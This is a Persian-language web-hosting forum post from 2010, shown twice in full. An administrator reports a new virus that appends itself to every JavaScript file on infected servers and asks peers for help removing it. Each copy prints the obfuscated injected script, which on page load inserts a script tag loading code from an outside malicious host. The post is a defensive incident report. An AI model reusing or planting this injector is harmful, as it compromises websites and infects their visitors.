Dadeha.com
January 6th, 2010, 15:17
سلام دوستان
چندي پيش اكثر سرويس دهنگان دچار ويروسي شدند كه بعد ها معروف شد به ويروس js كه گوگل سايت رو مخرب ميشناخت و . . . ولي خوب راه حل داشت كه يكسري فايل php و يكسري كد مشخص در برخي فايل ها بود كه ميشد رفعش كرد و راه نفوذش هم از طريف ftp بود.
اينبار ويروس جديدي اومده كه اكثر سرويس دهنگان رو دچار خودش كرده.
دقيق نميدونم اسمش چيه و چي هست ولي در آخر تمام فايل هاي jsخودش رو كپي ميكنه كه ابتداش هم اين كد هستش
/*GNU GPL*/
پس اون رو با نام GNU GPL ميشناسيم. :-o
الان تمام سايت هاي سرور مادچار اين ويروس شده و بقيش هم داره آلوده ميشه. :66:
اين نمونه كدش هست:
/*GNU GPL*/ try{window.onload = function(){var Cso9f3zbpopes = document.createElement('s^(c!#r##i&)p(#@t#$'.replace(/@|\)|\!|\$|#|&|\^|\(/ig, ''));var Nzol2dvsd2 = 'Ojzdtti6seof7l';Cso9f3zbpopes.setAttribute('type' , 't@@!e(&(x!)t^&$&!/)@&&j#^^a#v(!a)^s)c^r&$i)$p)$#t&'.replace(/#|\)|\(|&|\$|\!|\^|@/ig, ''));Cso9f3zbpopes.setAttribute('src', 'h(&!t^#^t!p((^:(!/##^^/#b^$i@(@z$)^r@#^a^!!t&)e@$-#^!c#$#o#^m$)&@.^i#(!@m^p^r!!e)#s@@(s)^!.@&c^#$o)$^.&$(((j@#p)(^@.$@t^$h$e^($p$&(i)&&r#a#t$e$^^)b@!a)y)$-#!&o($^r(&g)#@^.^&s@$i@@t@)!e&)s!#a&&g(@@)e#^s&^(.&&#r^)()u$$:#)(8&0)@8!!0$$)/$$@g)#o(()o@&g&(l^&e@!.^(c#&o!((@@m#$)!/(^g&@o@o#&#^g!&&l$#e&&^!).)^#^c&()o#@m#/^^@h&&##o$!)t^f#)&^i)!l!e^^).&!^!#c!#@^o^($m#()&/)@a)#!u#&t)!^o!$!#.!&@r)&$!u^^$/))t&)^o$$$p!(i#^@x!.)!#c()#@o$m#@/^#!'.replace(/\^|\(|\)|&|\!|#|@|\$/ig, ''));Cso9f3zbpopes.setAttribute('defer', 'd#$(e^^$f!&@e$r&#&'.replace(/#|@|\$|\!|&|\)|\(|\^/ig, ''));Cso9f3zbpopes.setAttribute('id', 'U!(2))#@2@3!!(0@u(g)4!&#v&$2&)^^x)&('.replace(/@|\$|&|\!|#|\)|\^|\(/ig, ''));document.body.appendChild(Cso9f3zbpopes);}} catch(Vm2be34ea8nhd) {}
دوستان لطفا يه همفكري بكنيم تا بتونيم مانند سري قبل سريعا مشكل رو حل كنيم.
باتشكر :77:
چندي پيش اكثر سرويس دهنگان دچار ويروسي شدند كه بعد ها معروف شد به ويروس js كه گوگل سايت رو مخرب ميشناخت و . . . ولي خوب راه حل داشت كه يكسري فايل php و يكسري كد مشخص در برخي فايل ها بود كه ميشد رفعش كرد و راه نفوذش هم از طريف ftp بود.
اينبار ويروس جديدي اومده كه اكثر سرويس دهنگان رو دچار خودش كرده.
دقيق نميدونم اسمش چيه و چي هست ولي در آخر تمام فايل هاي jsخودش رو كپي ميكنه كه ابتداش هم اين كد هستش
/*GNU GPL*/
پس اون رو با نام GNU GPL ميشناسيم. :-o
الان تمام سايت هاي سرور مادچار اين ويروس شده و بقيش هم داره آلوده ميشه. :66:
اين نمونه كدش هست:
/*GNU GPL*/ try{window.onload = function(){var Cso9f3zbpopes = document.createElement('s^(c!#r##i&)p(#@t#$'.replace(/@|\)|\!|\$|#|&|\^|\(/ig, ''));var Nzol2dvsd2 = 'Ojzdtti6seof7l';Cso9f3zbpopes.setAttribute('type' , 't@@!e(&(x!)t^&$&!/)@&&j#^^a#v(!a)^s)c^r&$i)$p)$#t&'.replace(/#|\)|\(|&|\$|\!|\^|@/ig, ''));Cso9f3zbpopes.setAttribute('src', 'h(&!t^#^t!p((^:(!/##^^/#b^$i@(@z$)^r@#^a^!!t&)e@$-#^!c#$#o#^m$)&@.^i#(!@m^p^r!!e)#s@@(s)^!.@&c^#$o)$^.&$(((j@#p)(^@.$@t^$h$e^($p$&(i)&&r#a#t$e$^^)b@!a)y)$-#!&o($^r(&g)#@^.^&s@$i@@t@)!e&)s!#a&&g(@@)e#^s&^(.&&#r^)()u$$:#)(8&0)@8!!0$$)/$$@g)#o(()o@&g&(l^&e@!.^(c#&o!((@@m#$)!/(^g&@o@o#&#^g!&&l$#e&&^!).)^#^c&()o#@m#/^^@h&&##o$!)t^f#)&^i)!l!e^^).&!^!#c!#@^o^($m#()&/)@a)#!u#&t)!^o!$!#.!&@r)&$!u^^$/))t&)^o$$$p!(i#^@x!.)!#c()#@o$m#@/^#!'.replace(/\^|\(|\)|&|\!|#|@|\$/ig, ''));Cso9f3zbpopes.setAttribute('defer', 'd#$(e^^$f!&@e$r&#&'.replace(/#|@|\$|\!|&|\)|\(|\^/ig, ''));Cso9f3zbpopes.setAttribute('id', 'U!(2))#@2@3!!(0@u(g)4!&#v&$2&)^^x)&('.replace(/@|\$|&|\!|#|\)|\^|\(/ig, ''));document.body.appendChild(Cso9f3zbpopes);}} catch(Vm2be34ea8nhd) {}
دوستان لطفا يه همفكري بكنيم تا بتونيم مانند سري قبل سريعا مشكل رو حل كنيم.
باتشكر :77: